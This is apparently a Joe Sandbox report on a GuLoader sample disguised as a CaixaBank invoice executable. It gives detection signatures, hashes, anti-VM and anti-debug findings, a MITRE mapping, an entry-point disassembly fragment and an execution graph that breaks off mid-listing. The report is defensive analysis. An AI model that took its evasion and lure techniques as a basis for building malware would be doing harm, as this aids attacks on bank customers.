Loading ...

Play interactive tourEdit tour

Analysis Report CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exe

Overview

General Information

Sample Name:CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exe
Analysis ID:356558
MD5:4b0c59e06d56f96b602535d32ef842eb
SHA1:bd1fc302cd46654ede8c914438f8dc12552cdf71
SHA256:83c3850412a66c31e48de8bb8e252982f52b3482a79fadad65b48692a1030a89

Most interesting Screenshot:

Detection

GuLoader
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Potential malicious icon found
Yara detected GuLoader
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Executable has a suspicious name (potential lure to open the executable)
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Abnormal high CPU Usage
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Detected potential crypto function
PE file contains strange resources
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exe PID: 6048JoeSecurity_VB6DownloaderGenericYara detected VB6 Downloader GenericJoe Security
    Process Memory Space: CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exe PID: 6048JoeSecurity_GuLoaderYara detected GuLoaderJoe Security

      Sigma Overview

      No Sigma rule has matched

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exeVirustotal: Detection: 54%Perma Link
      Source: CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exeMetadefender: Detection: 21%Perma Link
      Source: CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exeReversingLabs: Detection: 64%

      Compliance:

      barindex
      Uses 32bit PE filesShow sources
      Source: CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

      System Summary:

      barindex
      Potential malicious icon foundShow sources
      Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
      Executable has a suspicious name (potential lure to open the executable)Show sources
      Source: CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exeStatic file information: Suspicious name
      Initial sample is a PE file and has a suspicious nameShow sources
      Source: initial sampleStatic PE information: Filename: CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exe
      Source: C:\Users\user\Desktop\CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exeProcess Stats: CPU usage > 98%
      Source: C:\Users\user\Desktop\CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exeCode function: 0_2_004013B00_2_004013B0
      Source: CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exe, 00000000.00000002.1173000183.0000000000410000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameNarro3.exe vs CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exe
      Source: CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exe, 00000000.00000002.1173308848.0000000002090000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exe
      Source: CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exeBinary or memory string: OriginalFilenameNarro3.exe vs CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exe
      Source: CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: classification engineClassification label: mal88.rans.troj.evad.winEXE@1/0@0/0
      Source: CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
      Source: C:\Users\user\Desktop\CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exeVirustotal: Detection: 54%
      Source: CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exeMetadefender: Detection: 21%
      Source: CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exeReversingLabs: Detection: 64%

      Data Obfuscation:

      barindex
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: Process Memory Space: CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exe PID: 6048, type: MEMORY
      Yara detected VB6 Downloader GenericShow sources
      Source: Yara matchFile source: Process Memory Space: CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exe PID: 6048, type: MEMORY
      Source: C:\Users\user\Desktop\CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exeCode function: 0_2_00407201 push ds; retf 0_2_00407240
      Source: C:\Users\user\Desktop\CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exeCode function: 0_2_004082EF push eax; retf 0_2_004082F6
      Source: C:\Users\user\Desktop\CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exeCode function: 0_2_020F5701 push eax; ret 0_2_020F5702
      Source: C:\Users\user\Desktop\CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exeCode function: 0_2_020F534F push es; ret 0_2_020F5357
      Source: C:\Users\user\Desktop\CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion:

      barindex
      Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
      Source: C:\Users\user\Desktop\CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exeRDTSC instruction interceptor: First address: 00000000020F5008 second address: 00000000020F5008 instructions:
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exe, 00000000.00000002.1173395920.00000000020F0000.00000040.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEF9
      Source: CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exeBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\user\Desktop\CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exeRDTSC instruction interceptor: First address: 00000000020F5008 second address: 00000000020F5008 instructions:
      Source: C:\Users\user\Desktop\CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exeCode function: 0_2_020F440B rdtsc 0_2_020F440B
      Source: CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exe, 00000000.00000002.1173395920.00000000020F0000.00000040.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exef9
      Source: CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exeCode function: 0_2_020F440B rdtsc 0_2_020F440B
      Source: C:\Users\user\Desktop\CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exeCode function: 0_2_020F2A58 mov eax, dword ptr fs:[00000030h]0_2_020F2A58
      Source: C:\Users\user\Desktop\CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exeCode function: 0_2_020F1C89 mov eax, dword ptr fs:[00000030h]0_2_020F1C89
      Source: C:\Users\user\Desktop\CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exeCode function: 0_2_020F1C87 mov eax, dword ptr fs:[00000030h]0_2_020F1C87
      Source: C:\Users\user\Desktop\CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exeCode function: 0_2_020F1CEB mov eax, dword ptr fs:[00000030h]0_2_020F1CEB
      Source: C:\Users\user\Desktop\CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exeCode function: 0_2_020F497E mov eax, dword ptr fs:[00000030h]0_2_020F497E
      Source: C:\Users\user\Desktop\CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exeCode function: 0_2_020F4DEF mov eax, dword ptr fs:[00000030h]0_2_020F4DEF
      Source: CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exe, 00000000.00000002.1173228044.0000000000C70000.00000002.00000001.sdmpBinary or memory string: Program Manager
      Source: CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exe, 00000000.00000002.1173228044.0000000000C70000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exe, 00000000.00000002.1173228044.0000000000C70000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exe, 00000000.00000002.1173228044.0000000000C70000.00000002.00000001.sdmpBinary or memory string: Progmanlock
      Source: C:\Users\user\Desktop\CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exeCode function: 0_2_020F4E1E cpuid 0_2_020F4E1E

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection1Process Injection1OS Credential DumpingSecurity Software Discovery311Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsObfuscated Files or Information1LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerSystem Information Discovery211SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exe55%VirustotalBrowse
      CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exe24%MetadefenderBrowse
      CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exe64%ReversingLabsWin32.Trojan.Vebzenpak

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      No Antivirus matches

      Domains and IPs

      Contacted Domains

      No contacted domains info

      Contacted IPs

      No contacted IP infos

      General Information

      Joe Sandbox Version:31.0.0 Emerald
      Analysis ID:356558
      Start date:23.02.2021
      Start time:10:10:50
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 7m 20s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exe
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Number of analysed new started processes analysed:18
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal88.rans.troj.evad.winEXE@1/0@0/0
      EGA Information:
      • Successful, ratio: 100%
      HDC Information:
      • Successful, ratio: 3.6% (good quality ratio 2.9%)
      • Quality average: 45.1%
      • Quality standard deviation: 23.5%
      HCA Information:Failed
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .exe
      • Override analysis time to 240s for sample files taking high CPU consumption
      Warnings:
      Show All
      • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe

      Simulations

      Behavior and APIs

      No simulations

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASN

      No context

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      No created / dropped files found

      Static File Info

      General

      File type:PE32 executable (GUI) Intel 80386, for MS Windows
      Entropy (8bit):5.395614627986068
      TrID:
      • Win32 Executable (generic) a (10002005/4) 99.15%
      • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
      • Generic Win/DOS Executable (2004/3) 0.02%
      • DOS Executable Generic (2002/1) 0.02%
      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
      File name:CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exe
      File size:65536
      MD5:4b0c59e06d56f96b602535d32ef842eb
      SHA1:bd1fc302cd46654ede8c914438f8dc12552cdf71
      SHA256:83c3850412a66c31e48de8bb8e252982f52b3482a79fadad65b48692a1030a89
      SHA512:5f1d75ddfcebfc45b52df88500a941d0752b7bdf53caaf2d0c5d32c9baf31f8bd2ff3b382db775f14ebcffc6318f561bff6fd99d6d798fcecfbc09c96b5a1b30
      SSDEEP:768:EldtJlJFVGEtCOUGVZGkw15dCRq4EPmqfOCsm29aV42:SzJlgEtCoZGR15dCRq4EPmhCstY
      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........+O..E...E...E.X.K...E...L...E...H...E.Rich..E.................PE..L...q.'W.....................0....................@........

      File Icon

      Icon Hash:20047c7c70f0e004

      Static PE Info

      General

      Entrypoint:0x4013b0
      Entrypoint Section:.text
      Digitally signed:false
      Imagebase:0x400000
      Subsystem:windows gui
      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      DLL Characteristics:
      Time Stamp:0x5727CB71 [Mon May 2 21:49:37 2016 UTC]
      TLS Callbacks:
      CLR (.Net) Version:
      OS Version Major:4
      OS Version Minor:0
      File Version Major:4
      File Version Minor:0
      Subsystem Version Major:4
      Subsystem Version Minor:0
      Import Hash:e040c8c04f7f9a83c53d48451cf696fa

      Entrypoint Preview

      Instruction
      push 00401A48h
      call 00007F34ECA5B8D3h
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      xor byte ptr [eax], al
      add byte ptr [eax], al
      inc eax
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [edi+54h], al
      dec esp
      pop ebp
      xor ch, byte ptr [edx-61h]
      inc ebp
      xor dword ptr [ecx], 78h
      adc bh, byte ptr [ebp+007F95D3h]
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [ecx], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add al, ah
      fild word ptr [esi]
      add ebp, dword ptr [esi+6Fh]
      outsb
      jbe 00007F34ECA5B947h
      je 00007F34ECA5B945h
      bound eax, dword ptr [eax]
      add byte ptr [eax], ah
      or byte ptr [ecx+00h], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      dec esp
      xor dword ptr [eax], eax
      pop es
      jmp 00007F34E7B31864h
      push 0D9D4625h
      sbb eax, CAB8DA9Eh
      mov seg?, word ptr [esi+esi+5Bh]
      dec esi
      adc byte ptr [ecx+288E47EAh], bh
      jecxz 00007F34ECA5B8A0h
      nop
      push cs
      scasb
      pop esi
      cmp cl, byte ptr [edi-53h]
      xor ebx, dword ptr [ecx-48EE309Ah]
      or al, 00h
      stosb
      add byte ptr [eax-2Dh], ah
      xchg eax, ebx
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      test dword ptr [ecx], eax
      add byte ptr [eax], al
      inc ebp
      add byte ptr [eax], al
      add byte ptr [eax], al
      or dword ptr [eax], eax
      imul ebp, dword ptr [esi+64h], 69726B73h
      jbe 00007F34ECA5B947h
      add byte ptr [4B000701h], cl
      popad
      jo 00007F34ECA5B94Bh
      je 00007F34ECA5B943h

      Data Directories

      NameVirtual AddressVirtual Size Is in Section
      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IMPORT0xd3140x28.text
      IMAGE_DIRECTORY_ENTRY_RESOURCE0x100000x9b4.rsrc
      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2300x20
      IMAGE_DIRECTORY_ENTRY_IAT0x10000xf8.text
      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

      Sections

      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
      .text0x10000xc7980xd000False0.479154146635data6.08183817193IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      .data0xe0000x19580x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
      .rsrc0x100000x9b40x1000False0.179931640625data2.12202104214IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

      Resources

      NameRVASizeTypeLanguageCountry
      RT_ICON0x108840x130data
      RT_ICON0x1059c0x2e8data
      RT_ICON0x104740x128GLS_BINARY_LSB_FIRST
      RT_GROUP_ICON0x104440x30data
      RT_VERSION0x101500x2f4dataHungarianHungary

      Imports

      DLLImport
      MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaLateMemSt, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaCyStr, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, __vbaVarTstEq, __vbaObjVar, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaFpCmpCy, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaErrorOverflow, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarAdd, __vbaVarDup, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

      Version Infos

      DescriptionData
      Translation0x040e 0x04b0
      LegalCopyrightCopyright (C) Tulix
      InternalNameNarro3
      FileVersion1.00
      CompanyNameTulix
      LegalTrademarksCopyright (C) Tulix
      CommentsTulix
      ProductNameTulix
      ProductVersion1.00
      FileDescriptionTulix
      OriginalFilenameNarro3.exe

      Possible Origin

      Language of compilation systemCountry where language is spokenMap
      HungarianHungary

      Network Behavior

      No network behavior found

      Code Manipulations

      Statistics

      CPU Usage

      Click to jump to process

      Memory Usage

      Click to jump to process

      System Behavior

      General

      Start time:10:11:38
      Start date:23/02/2021
      Path:C:\Users\user\Desktop\CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exe
      Wow64 process (32bit):true
      Commandline:'C:\Users\user\Desktop\CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 Contrato 7621780..exe'
      Imagebase:0x400000
      File size:65536 bytes
      MD5 hash:4B0C59E06D56F96B602535D32EF842EB
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:Visual Basic
      Reputation:low

      Disassembly

      Code Analysis

      Reset < >

        Execution Graph

        Execution Coverage:5.5%
        Dynamic/Decrypted Code Coverage:24.5%
        Signature Coverage:6.9%
        Total number of Nodes:375
        Total number of Limit Nodes:27

        Graph

        execution_graph 3297 40ce40 __vbaChkstk 3298 40ce80 __vbaCyStr __vbaFpCmpCy 3297->3298 3299 40cff2 3298->3299 3300 40ce9f 3298->3300 3301 40ced6 3300->3301 3302 40cebc __vbaHresultCheckObj 3300->3302 3303 40cee3 __vbaNew2 3301->3303 3304 40cefb 3301->3304 3302->3301 3303->3304 3305 40cf13 __vbaNew2 3304->3305 3306 40cf2b __vbaObjSet 3304->3306 3305->3306 3308 40cf64 3306->3308 3309 40cf89 3308->3309 3310 40cf6f __vbaHresultCheckObj 3308->3310 3311 40cf8d __vbaObjSet 3309->3311 3310->3311 3312 40cfb2 3311->3312 3313 40cfd4 3312->3313 3314 40cfbd __vbaHresultCheckObj 3312->3314 3315 40cfd8 __vbaFreeStr __vbaFreeObjList 3313->3315 3314->3315 3315->3299 3117 40a7c4 __vbaChkstk 3118 40a811 3117->3118 3119 40a87c 3118->3119 3120 40a85c __vbaHresultCheckObj 3118->3120 3121 40a883 9 API calls 3119->3121 3120->3121 3122 40a93a __vbaObjSet 3121->3122 3123 40a91f __vbaNew2 3121->3123 3125 40a988 3122->3125 3123->3122 3126 40a999 __vbaHresultCheckObj 3125->3126 3127 40a9bc 3125->3127 3128 40a9c3 8 API calls 3126->3128 3127->3128 3129 40aa88 3128->3129 3130 40ab6b 3128->3130 3133 40aa91 __vbaNew2 3129->3133 3134 40aaac 3129->3134 3131 40ab74 __vbaNew2 3130->3131 3132 40ab8f __vbaObjSet 3130->3132 3131->3132 3138 40abdd 3132->3138 3133->3134 3136 40ab0a 3134->3136 3137 40aaea __vbaHresultCheckObj 3134->3137 3141 40ab5c 3136->3141 3142 40ab3c __vbaHresultCheckObj 3136->3142 3137->3136 3139 40ac11 3138->3139 3140 40abee __vbaHresultCheckObj 3138->3140 3144 40ac7d 3139->3144 3145 40ac5d __vbaHresultCheckObj 3139->3145 3140->3139 3143 40ab63 __vbaFreeObj 3141->3143 3142->3143 3143->3130 3146 40ac84 __vbaFreeObj __vbaFreeVar 3144->3146 3145->3146 3147 40acb8 __vbaObjSet 3146->3147 3148 40ac9d __vbaNew2 3146->3148 3150 40ad00 3147->3150 3148->3147 3151 40ad31 3150->3151 3152 40ad11 __vbaHresultCheckObj 3150->3152 3153 40ae12 3151->3153 3154 40adf2 __vbaHresultCheckObj 3151->3154 3152->3151 3155 40ae19 __vbaFreeObj __vbaFreeVarList 3153->3155 3154->3155 3156 40ae53 3155->3156 3157 40ae82 3156->3157 3158 40ae62 __vbaHresultCheckObj 3156->3158 3159 40aeb8 __vbaObjSet 3157->3159 3160 40ae9d __vbaNew2 3157->3160 3158->3157 3162 40af06 3159->3162 3160->3159 3163 40af17 __vbaHresultCheckObj 3162->3163 3164 40af3a 3162->3164 3165 40af41 __vbaChkstk 3163->3165 3164->3165 3166 40afbd __vbaVarMove __vbaFreeObj 3165->3166 3167 40aff4 __vbaObjSet 3166->3167 3168 40afd9 __vbaNew2 3166->3168 3170 40b042 3167->3170 3168->3167 3171 40b053 __vbaHresultCheckObj 3170->3171 3172 40b076 3170->3172 3171->3172 3173 40b0a1 __vbaObjSet 3172->3173 3174 40b086 __vbaNew2 3172->3174 3176 40b0ef 3173->3176 3174->3173 3177 40b100 __vbaHresultCheckObj 3176->3177 3178 40b123 3176->3178 3177->3178 3179 40b133 __vbaNew2 3178->3179 3180 40b14e __vbaObjSet 3178->3180 3179->3180 3182 40b199 3180->3182 3183 40b1aa __vbaHresultCheckObj 3182->3183 3184 40b1cd 3182->3184 3185 40b1d4 __vbaChkstk 3183->3185 3184->3185 3186 40b279 3185->3186 3187 40b2a8 3186->3187 3188 40b288 __vbaHresultCheckObj 3186->3188 3189 40b2af __vbaFreeObjList __vbaFreeVar 3187->3189 3188->3189 3190 40b2fa __vbaObjSet 3189->3190 3191 40b2df __vbaNew2 3189->3191 3193 40b345 3190->3193 3191->3190 3194 40b376 3193->3194 3195 40b356 __vbaHresultCheckObj 3193->3195 3196 40b3a1 __vbaObjSet 3194->3196 3197 40b386 __vbaNew2 3194->3197 3195->3194 3199 40b3ef 3196->3199 3197->3196 3200 40b400 __vbaHresultCheckObj 3199->3200 3201 40b423 3199->3201 3200->3201 3202 40b433 __vbaNew2 3201->3202 3203 40b44e __vbaObjSet 3201->3203 3202->3203 3205 40b499 3203->3205 3206 40b4aa __vbaHresultCheckObj 3205->3206 3207 40b4cd __vbaFreeObjList __vbaFreeVar 3205->3207 3206->3207 3209 40b5b0 __vbaNew2 3207->3209 3210 40b5cb __vbaObjSet 3207->3210 3209->3210 3212 40b616 3210->3212 3213 40b647 3212->3213 3214 40b627 __vbaHresultCheckObj 3212->3214 3215 40b672 __vbaObjSet 3213->3215 3216 40b657 __vbaNew2 3213->3216 3214->3213 3218 40b6c0 3215->3218 3216->3215 3219 40b6d1 __vbaHresultCheckObj 3218->3219 3220 40b6f4 3218->3220 3219->3220 3221 40b756 3220->3221 3222 40b736 __vbaHresultCheckObj 3220->3222 3223 40b75d __vbaFreeObjList 3221->3223 3222->3223 3224 40b793 __vbaObjSet 3223->3224 3225 40b778 __vbaNew2 3223->3225 3227 40b7de 3224->3227 3225->3224 3228 40b812 3227->3228 3229 40b7ef __vbaHresultCheckObj 3227->3229 3230 40b822 __vbaNew2 3228->3230 3231 40b83d __vbaObjSet 3228->3231 3229->3228 3230->3231 3233 40b88b 3231->3233 3234 40b89c __vbaHresultCheckObj 3233->3234 3235 40b8bf 3233->3235 3234->3235 3236 40b949 3235->3236 3237 40b929 __vbaHresultCheckObj 3235->3237 3238 40b950 __vbaFreeObjList __vbaFreeVar 3236->3238 3237->3238 3239 40b981 3238->3239 3240 40b992 